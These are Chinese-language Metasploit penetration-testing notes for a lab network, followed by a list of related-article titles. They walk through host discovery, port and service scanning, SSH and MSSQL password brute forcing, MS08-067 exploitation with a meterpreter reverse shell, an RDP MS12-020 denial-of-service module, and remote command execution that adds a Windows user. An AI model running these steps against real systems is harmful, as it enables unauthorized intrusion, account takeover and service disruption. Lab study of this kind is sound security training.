Nmap

在msf里的namp 使用方法与单独使用无差别,不再赘述。

msf5 > db_nmap -sV 192.168.172.130

[*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-07 16:20 CST
[*] Nmap: Nmap scan report for 192.168.172.130
[*] Nmap: Host is up (0.0011s latency).
[*] Nmap: Not shown: 997 closed ports
[*] Nmap: PORT    STATE SERVICE      VERSION
[*] Nmap: 135/tcp open  msrpc        Microsoft Windows RPC
[*] Nmap: 139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
[*] Nmap: 445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
[*] Nmap: MAC Address: 00:0C:29:02:A0:43 (VMware)
[*] Nmap: Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 10.00 seconds

auxiliary/scanner/

查看所有模块

msf5 > use auxiliary/scanner [按两次table]

主机发现

发现方式

msf5 > use auxiliary/scanner/discovery/ [按两次table]

use auxiliary/scanner/discovery/arp_sweep                           use auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement
use auxiliary/scanner/discovery/empty_udp                           use auxiliary/scanner/discovery/udp_probe
use auxiliary/scanner/discovery/ipv6_multicast_ping                 use auxiliary/scanner/discovery/udp_sweep

ARP 主机发现:

msf5 > use auxiliary/scanner/discovery/arp_sweep
# 设置目标ip,表示方式可以为192.168.1.1-192.168.1.20 或 192.168.1.1/24 或 192.168.1.1/24,192.168.2.1/24
#
msf5 auxiliary(scanner/discovery/arp_sweep) > options
# 可以伪造源ip(SHOST)与源MAC(SMAC)
# 设置线程数为20
msf5 auxiliary(scanner/discovery/arp_sweep) > set THREADS 20
msf5 auxiliary(scanner/discovery/arp_sweep) > run

[+] 192.168.172.1 appears to be up (VMware, Inc.).
[+] 192.168.172.2 appears to be up (VMware, Inc.).
[+] 192.168.172.130 appears to be up (VMware, Inc.).
[+] 192.168.172.254 appears to be up (VMware, Inc.).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

查找僵尸机(足够空闲,ipid顺序增长)

msf5 > use auxiliary/scanner/ip/ipidseqmsf5 auxiliary(scanner/ip/ipidseq) > set rhosts 192.168.172.1/24msf5 auxiliary(scanner/ip/ipidseq) > set ports 80msf5 auxiliary(scanner/ip/ipidseq) > set threads 20msf5 auxiliary(scanner/ip/ipidseq) > run

[*] 192.168.172.2's IPID sequence class: Incremental!
[*] Scanned  30 of 256 hosts (11% complete)
[*] Scanned  52 of 256 hosts (20% complete)
[*] Scanned  78 of 256 hosts (30% complete)
[*] Scanned 103 of 256 hosts (40% complete)
[*] 192.168.172.130's IPID sequence class: Incremental!
[*] Scanned 129 of 256 hosts (50% complete)
[*] Scanned 154 of 256 hosts (60% complete)
[*] Scanned 180 of 256 hosts (70% complete)
[*] Scanned 205 of 256 hosts (80% complete)
[*] Scanned 231 of 256 hosts (90% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

发现了192.168.172.2与192.168.172.130的IPID是递增的,如果他足够空闲(没有与其它主机通信),就可以作为僵尸机代替扫描。

使用nmap 利用僵尸机进行僵尸扫描:

msf5 auxiliary(scanner/ip/ipidseq) > db_nmap -sV -PN -sI 192.168.172.130 192.168.172.133

[*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-08 15:12 CST
[*] Nmap: Idle scan using zombie 192.168.172.130 (192.168.172.130:80); Class: Incremental
[*] Nmap: Nmap scan report for 192.168.172.133
[*] Nmap: Host is up (0.051s latency).
[*] Nmap: Not shown: 986 closed|filtered ports
[*] Nmap: PORT     STATE SERVICE       VERSION
[*] Nmap: 7/tcp    open  echo
[*] Nmap: 9/tcp    open  discard?
[*] Nmap: 13/tcp   open  daytime?
[*] Nmap: 17/tcp   open  qotd          Windows qotd (English)
[*] Nmap: 19/tcp   open  chargen
[*] Nmap: 53/tcp   open  domain?
[*] Nmap: 80/tcp   open  http          Microsoft IIS httpd 6.0
[*] Nmap: 135/tcp  open  msrpc         Microsoft Windows RPC
[*] Nmap: 139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
[*] Nmap: 445/tcp  open  microsoft-ds  Microsoft Windows 2003 or 2008 microsoft-ds
[*] Nmap: 1025/tcp open  msrpc         Microsoft Windows RPC
[*] Nmap: 1028/tcp open  msrpc         Microsoft Windows RPC
[*] Nmap: 1029/tcp open  msrpc         Microsoft Windows RPC
[*] Nmap: 3389/tcp open  ms-wbt-server Microsoft Terminal Service

端口扫描(推荐使用nmap,效率更高)

扫描方式

msf5 > use auxiliary/scanner/portscan/ [按两次table]

use auxiliary/scanner/portscan/ack        use auxiliary/scanner/portscan/syn        use auxiliary/scanner/portscan/xmas
use auxiliary/scanner/portscan/ftpbounce  use auxiliary/scanner/portscan/tcp

syn扫描

msf5 > use auxiliary/scanner/portscan/syn
msf5 auxiliary(scanner/portscan/syn) > set rhosts 192.168.172.130
msf5 auxiliary(scanner/portscan/syn) > set ports 80
msf5 auxiliary(scanner/portscan/syn) > set threads 50
msf5 auxiliary(scanner/portscan/syn) > run

SNMP扫描

破解

msf5 > use auxiliary/scanner/snmp/snmp_loginmsf5 auxiliary(scanner/snmp/snmp_login) > set rhosts 192.168.172.135msf5 auxiliary(scanner/snmp/snmp_login) > set threads 10msf5 auxiliary(scanner/snmp/snmp_login) > run

破解了一个只读权限的账户

[+] 192.168.172.135:161 - Login Successful: public (Access level: read-only); Proof (sysDescr.0): Linux bingyi-virtual-machine 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64

读取信息

msf5 auxiliary(scanner/snmp/snmp_login) > use auxiliary/scanner/snmp/snmp_enummsf5 auxiliary(scanner/snmp/snmp_enum) > set rhosts 192.168.172.135msf5 auxiliary(scanner/snmp/snmp_enum) > run

[*] System information:Host IP                       : 192.168.172.135
Hostname                      : bingyi-virtual-machine
Description                   : Linux bingyi-virtual-machine 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64
Contact                       : Me <me@example.org>
Location                      : Sitting on the Dock of the Bay
Uptime snmp                   : 11:18:08.39
Uptime system                 : 00:06:23.04
System date                   : 2020-11-9 10:51:42.0

windows:

# 枚举用户信息
use auxiliary/scanner/snmp/snmp_enumusers
# 枚举文件共享信息
use auxiliary/scanner/snmp/snmp_enumshares

SMB扫描

发现

msf5 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.172.131msf5 auxiliary(scanner/smb/smb_version) > run

[*] 192.168.172.131:445   - Host could not be identified: Unix (Samba 3.0.20-Debian)
[*] 192.168.172.131:445   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

扫描命名管道

msf5 auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/smb/pipe_auditormsf5 auxiliary(scanner/smb/pipe_auditor) > set rhosts 192.168.172.131msf5 auxiliary(scanner/smb/pipe_auditor) > run

枚举共享

msf5 auxiliary(scanner/smb/pipe_auditor) > use auxiliary/scanner/smb/smb_enumshares msf5 auxiliary(scanner/smb/smb_enumshares) > set rhosts 192.168.172.131msf5 auxiliary(scanner/smb/smb_enumshares) > set smbuser msfadminmsf5 auxiliary(scanner/smb/smb_enumshares) > set smbpass msfadminmsf5 auxiliary(scanner/smb/smb_enumshares) > run

SSH 扫描

发现

版本扫描,如果是低版本可利用漏洞。

msf5 > use auxiliary/scanner/ssh/ssh_version msf5 auxiliary(scanner/ssh/ssh_version) > set rhosts 192.168.172.135msf5 auxiliary(scanner/ssh/ssh_version) > run

[+] 192.168.172.135:22    - SSH server version: SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8 ( service.version=7.2p2 openssh.comment=Ubuntu-4ubuntu2.8 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:7.2p2 os.vendor=Ubuntu os.family=Linux os.product=Linux os.version=16.04 os.cpe23=cpe:/o:canonical:ubuntu_linux:16.04 service.protocol=ssh fingerprint_db=ssh.banner )
[*] 192.168.172.135:22    - Scanned 1 of 1 hosts (100% complete)

密码爆破

msf5 > use auxiliary/scanner/ssh/ssh_loginmsf5 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.172.135msf5 auxiliary(scanner/ssh/ssh_login) > set username bingyimsf5 auxiliary(scanner/ssh/ssh_login) > set pass_file ~/Desktop/dic/shhpass.txtmsf5 auxiliary(scanner/ssh/ssh_login) > set thread 10msf5 auxiliary(scanner/ssh/ssh_login) > run

[+] 192.168.172.135:22 - Success: 'bingyi:123' 'uid=1000(bingyi) gid=1000(bingyi) groups=1000(bingyi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare) Linux bingyi-virtual-machine 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
[*] Command shell session 1 opened (192.168.172.129:35897 -> 192.168.172.135:22) at 2020-11-11 13:00:13 +0800
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

密钥爆破

msf5 auxiliary(scanner/ssh/ssh_login) > use auxiliary/scanner/ssh/ssh_login_pubkey msf5 auxiliary(scanner/ssh/ssh_login_pubkey) > set rhosts 192.168.172.135msf5 auxiliary(scanner/ssh/ssh_login_pubkey) > show optionsmsf5 auxiliary(scanner/ssh/ssh_login_pubkey) > set key_path key.txtmsf5 auxiliary(scanner/ssh/ssh_login_pubkey) > run

FTP

版本扫描

msf5 > use auxiliary/scanner/ftp/ftp_version msf5 auxiliary(scanner/ftp/ftp_version) > set rhosts 192.168.172.131msf5 auxiliary(scanner/ftp/ftp_version) > run

[+] 192.168.172.131:21    - FTP Banner: '220 (vsFTPd 2.3.4)\x0d\x0a'
[*] 192.168.172.131:21    - Scanned 1 of 1 hosts (100% complete)

尝试匿名登录

msf5 auxiliary(scanner/ftp/ftp_version) > use auxiliary/scanner/ftp/anonymous msf5 auxiliary(scanner/ftp/anonymous) > set rhosts 192.168.172.131msf5 auxiliary(scanner/ftp/anonymous) > run

[+] 192.168.172.131:21    - 192.168.172.131:21 - Anonymous READ (220 (vsFTPd 2.3.4))
[*] 192.168.172.131:21    - Scanned 1 of 1 hosts (100% complete)

密码破解

Windows利用已获得的shell收集目标缺失补丁

获取shell,将shell注入其它进程

msf5 > use exploit/windows/smb/ms08_067_netapimsf5 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.172.130msf5 exploit(windows/smb/ms08_067_netapi) > set target 34msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcpmsf5 exploit(windows/smb/ms08_067_netapi) > run -j
# 进入会话
msf5 exploit(windows/smb/ms08_067_netapi) > session 2
# 显示shell当前所在进程
meterpreter > getpid
# 显示目标主机所有进程
meterpreter > ps
# 将shell注入进程其它进程
meterpreter > migrate 880
# 若之后报错[-] Known bug in WMI query, try migrating to another process,需要再注入其它进程

获取未安装补丁

msf5 exploit(windows/smb/ms08_067_netapi) > use post/windows/gather/enum_patches msf5 post(windows/gather/enum_patches) > set session 2msf5 post(windows/gather/enum_patches) > run

VNC

密码破解

msf5 > use auxiliary/scanner/vnc/vnc_login
msf5 auxiliary(scanner/vnc/vnc_login) > show options

尝试空密码登录

msf5 > use auxiliary/scanner/vnc/vnc_none_auth

RDP 远程桌面漏洞

检查是否存在某个漏洞

msf5 > use auxiliary/scanner/rdp/ms12_020_check
msf5 auxiliary(scanner/rdp/ms12_020_check) > show options
...

利用

msf5 auxiliary(scanner/rdp/ms12_020_check) > search ms12-020
msf5 auxiliary(scanner/rdp/ms12_020_check) > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf5 auxiliary(scanner/rdp/ms12_020_check) > show options
...

MSSQL

端口查询

默认端口:TCP1433(或动态端口)

动态端口查询方法:

msf5 > use auxiliary/scanner/mssql/mssql_pingmsf5 auxiliary(scanner/mssql/mssql_ping) > set rhosts 192.168.172.135msf5 auxiliary(scanner/mssql/mssql_ping) > run

密码爆破

msf5 > use auxiliary/scanner/mssql/mssql_loginmsf5 auxiliary(scanner/mssql/mssql_login) > set rhosts 192.168.172.135
# 如果是动态端口需手动配置
msf5 auxiliary(scanner/mssql/mssql_login) > set rport 49165msf5 auxiliary(scanner/mssql/mssql_login) > set threads 10msf5 auxiliary(scanner/mssql/mssql_login) > set pass_file pass.txtmsf5 auxiliary(scanner/mssql/mssql_login) > run

远程执行代码

在已知端口,账户,密码后,就可以执行远程命令。

msf5 > use auxiliary/admin/mssql/mssql_execmsf5 auxiliary(admin/mssql/mssql_exec) > set rhosts 192.168.172.135msf5 auxiliary(admin/mssql/mssql_exec) > set password 123
# 动态端口使用
msf5 auxiliary(admin/mssql/mssql_exec) > set rport 49165
# 执行命令为添加一个用户
msf5 auxiliary(admin/mssql/mssql_exec) > set CMD net user user pass /ADD

获取应用版本后搜索利用漏洞

msf5 > use auxiliary/scanner/ftp/ftp_version
msf5 auxiliary(scanner/ftp/ftp_version) > set rhosts 192.168.172.131
msf5 auxiliary(scanner/ftp/ftp_version) > run

[+] 192.168.172.131:21    - FTP Banner: '220 (vsFTPd 2.3.4)\x0d\x0a'
[*] 192.168.172.131:21    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

如知道ftp版本为2.3.4后可根据版本信息搜索:

msf5 auxiliary(scanner/ftp/ftp_login) > search 2.3.4

Matching Modules
================#  Name                                                      Disclosure Date  Rank       Check  Description-  ----                                                      ---------------  ----       -----  -----------0  auxiliary/gather/teamtalk_creds                                            normal     No     TeamTalk Gather Credentials1  exploit/multi/http/oscommerce_installer_unauth_code_exec  2018-04-30       excellent  Yes    osCommerce Installer Unauthenticated Code Execution2  exploit/multi/http/struts2_namespace_ognl                 2018-08-22       excellent  Yes    Apache Struts 2 Namespace Redirect OGNL Injection3  exploit/unix/ftp/vsftpd_234_backdoor                      2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution4  exploit/unix/http/zivif_ipcheck_exec                      2017-09-01       excellent  Yes    Zivif Camera iptest.cgi Blind Remote Command ExecutionInteract with a module by name or index, for example use 4 or use exploit/unix/http/zivif_ipcheck_exec

【渗透测试笔记】之【MSF 信息搜集】相关推荐

  1. 《MetaSploit渗透测试魔鬼训练营》之信息搜集

    目录 通过DNS和IP挖掘(踩点) whois域名注册信息查询 拓扑路径 网站目录 主机.端口及服务扫描 msf主机探测 Nmap 主机端口探测 操作系统.端口及版本扫描 常见服务扫描 Telnet ...

  2. 网站安全渗透测试维护公司 漏洞信息搜集方法

    快到十二月中旬了,很多渗透测试中的客户想要知道如何搜集这些漏洞信息和利用方式的检测,再次我们Sine安全的工程师给大家普及下如何发现漏洞以及如何去获取这些有用的信息来防护自身的网站项目平台安全,把网站 ...

  3. 渗透测试入门1之信息收集

    渗透测试入门1之信息收集 开源情报信息收集(OSINT) github whois查询/注册人反查/邮箱反查/相关资产 google hacking 创建企业密码字典 子域名获取 字典列表 邮箱列表获 ...

  4. 内网渗透系列:内网信息搜集方法小结2

    目录 前言 一.本机信息搜集 1.用户列表 (1)windows用户列表 (2)分析邮件用户 2.进程列表 3.服务列表 4.端口列表 5.补丁列表 6.本机共享 7.本用户习惯分析 8.获取当前用户 ...

  5. [在线挑战]【i春秋】渗透测试入门 —— 渗透测试笔记 --转

    [i春秋]渗透测试入门 -- 渗透测试笔记,原文 0x00 前言 本题算是一道较为综合的渗透题,要求对两个服务器系统进行渗透,第一个是基于齐博 CMS 的信息资讯平台 http://www.test. ...

  6. 细谈渗透测试的前期工作——信息收集

    细谈渗透测试的前期工作--信息收集 前言 0x01 收集什么信息 0x02 作用和收集方法 总结 前言 都说学安全的,查资料找信息什么的都是基本功,收集信息的能力都是杠杠的,经常网上有什么热门的事情, ...

  7. web安全攻防渗透测试笔记

    第三章sqlmap (1)      安装sqlmap前,需要先安装Python3.X Python Releases for Windows | Python.org (2)      在环境变量p ...

  8. web安全攻防渗透测试笔记 (信安一班 李静)

    第三章sqlmap (1)      安装sqlmap前,需要先安装Python3.X Python Releases for Windows | Python.org (2)      在环境变量p ...

  9. 内网渗透测试:内网信息收集与上传下载

    在之前的几节中,我们讲了隐藏通讯隧道技术的运用,那其实都是渗透测试的后话,接下来要讲的信息收集才是内网渗透的基础. 可以说内网渗透测试,其本质就是信息收集.信息收集的深度,直接关系到内网渗透测试的成败 ...

  10. 红队笔记之内网信息搜集技术要点总结

    在渗透测试中信息收集的深度与广度以及对关键信息的提取与关联,将影响渗透的质量.下文对整体技术要点进行总结. 1.明确要收集的内容: 2.分析要收集内容可能存储在系统的什么位置(收集方法): 3.明确收 ...

最新文章

  1. 提升10倍生产力:IDEA远程一键部署SpringBoot到Docker
  2. ANDROID BITMAP内存限制OOM,OUT OF MEMORY
  3. 数据结构 树的链式存储(二叉表示法)
  4. Fiddler学习之——对Android应用进行抓包
  5. C#LeetCode刷题之#501-二叉搜索树中的众数​​​​​​​(Find Mode in Binary Search Tree)
  6. OCaml已经做好iOS开发准备
  7. 暴力破解附近局域网WiFi密码
  8. 38、nginx的upstream目前支持的5种方式的分配
  9. 软件测试需求分析方法
  10. 【黑灰产犯罪研究】网络水军
  11. MATLAB中使用plotyy绘制双纵坐标图及坐标轴设置
  12. 夜曲 文/江湖一劍客
  13. 开入量与开出量的一点总结
  14. 无套路,鬼灭之刃同人游戏
  15. (PDF统一页面大小)PDF统一缩放至A4或指定大小
  16. osgEarth目标选择
  17. Uni-app中几种常用的提示框
  18. NCE4 L3 Matterhorn man
  19. Win10任务栏重启无数次都在转圈卡死解决方法(超级简单)
  20. 物联网由哪四层体系结构组成

热门文章

  1. python3 collections模块 tree_python3上的ete3模块无法导入TreeStyle、faces、AttrFace、NodeSty...
  2. [免费配音软件]配音助手1.0 阿里云配音软件
  3. linux下 安装企业微信
  4. MySQL运行内存设置
  5. TextRank算法原理简析、代码实现
  6. 你要如何衡量你的人生?
  7. 1.Linux系统编程-进程
  8. 生成SQLite的db文件
  9. ndoutils(ndo2db)安装难点
  10. 记2021沙尘漫天的春